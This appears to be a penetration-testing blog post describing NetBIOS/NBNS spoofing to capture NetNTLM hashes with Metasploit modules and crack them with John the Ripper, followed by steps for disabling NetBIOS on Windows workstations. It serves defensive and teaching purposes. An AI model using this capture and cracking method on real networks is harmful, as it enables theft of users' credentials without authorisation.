NetBIOS / NBNS Spoofing

To many, this method of gaining access is almost like cheating when on a customers site performing a penetration test.
It is a quick and dirty way to get users passwords without having to login to anyone else’s computer.
Simply sit down, plug in and your ready to go.
Netbios spoofing relies on a windows machine following the below process to resolve DNS queries:

  1. Windows first looks in its local hosts file
  2. It will then check its own DNS cache to see it has been recently resolved.
  3. If this fails, it will send a request over to its configured DNS server(s).
  4. If the DNS server cannot resolve it (and assuming the name is in the non-standard DNS format) the client will send the request to its configured WINS server (if specified).
  5. If at this point the client has still not received a reply, it will send out a series of NetBIOS broadcasts.
  6. Finally, if all else fails, it will look inside its LMHOSTS file

You can see from the list that our attack doesn’t come into play until the 5th stage. You may well be thinking that all the planets need to be aligned in order for this to work, but you’ll be surprised how on a busy network, just how many hashes you can capture using this method. There are plenty of situations that can be present on the network that will cause a client host to skip those first 4 steps, for instance:

  1. Clients that are running login scripts to map drives via the net use method
  2. Laptops brought into the environment from other domains will be “polling” for their printers and other resources that won’t exist on the network will also send out broadcast requests
  3. Mistyped URL’s such as googlecom will be rejected by the DNS server and as such, will need to be resolved via NetBIOS
  4. Modern browsers allow you to search via the address bar, and the browser needs to decide if the text is a host or a query. If the string has spaces, it is obviously a search request. If there are no spaces the browser doesn’t know if we want a server named “youtube” or we want to search for youtube.
So, as you can see, there are quite a few factors that can allow stage 5 to come into play a lot sooner than hoped.

NetBIOS uses a series of broadcasts and luckily for us, it provides very little verification as to who is sending back the replies, so anyone can falsely reply to say they are filesever1 for instance. The client will blindly trust this response, try to negotiate a NULL session and, if anonymous connections are disallowed, use the current user’s logon session in hashed format (NETNTLMv1 or NETNTLMv2) to authenticate to the filesever1 over SMB.

First, we need to set up a couple of Metasploit auxiliary modules to capture these hashes – the SMB and HTTP_NTLM modules.

$ start msfconsole
Next You will need to create a folder for Netbios. So in a new terminal windows type:

$ mkdir /netbios
We now need to set some auxiliaries for Metasploit and set the config to allow for our Netbois spoofing to work.

You can get hold of the script Here.
Once you have the script and filled in your own IP we can paste it into our Metasploit

Your Computer is now actively accepting Netbios requests. Now we wait for a request.

Once you have one it will look like this:

From here we can either load the hash into ‘cain’ or into ‘John-the-ripper’

If you now browse to the ‘/netbios/’ folder, you should see some files.

These are the hashes we have captured, that have been formatted for use for either ‘cain’ or into ‘John-the-ripper’.

To crack the hash using ‘John-the-ripper’ you can use the following command

$ /pentest/passwords/john/john john._netntlm –format=netntlm –wordlist=/root/Desktop/wordlist/passwords.txt
After a while you likely will have the hash cracked. However, there are many more options for ‘John-the-ripper’ that allow for wordlist manipulations (rules) that will make your attacks more affective.

Once your password is cracked, use the –show option to view the cracked passwords.

As you can see it has cracked 1 password already, it took roughly 3-5 seconds to crack the very predictable password.

username: boss
password: password
The idea here is that an everyday user will have a password you can crack in a couple of minutes.
The more Hashes you get the more you are likely to be able to crack.


The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before.

Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.

One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests.

 Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests.

But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:

Windows XP, Windows Server 2003, and Windows 2000

  1. On the desktop, right-click My Network Places, and then click Properties.
  2. Right-click Local Area Connection, and then click Properties
  3. In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
  4. Click Use NetBIOS setting from the DHCP server, and then click OK three times.

For Windows Vista

  1. On the desktop, right-click Network, and then click Properties.
  2. Under Tasks, click Manage network connections.
  3. Right-click Local Area Connection, and then click Properties
  4. In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
  5. Click Use NetBIOS setting from the DHCP server, and then click OK three times.

For Windows 7

  1. Click Start, and then click Control Panel.
  2. Under Network and Internet, click View network status and tasks.
  3. Click Change adapter settings.
  4. Right-click Local Area Connection, and then click Properties.
  5. In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
  6. Click Use NetBIOS setting from the DHCP server, and then click OK three times.


Popular posts from this blog

Null Session Domain Controller Enumeration

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution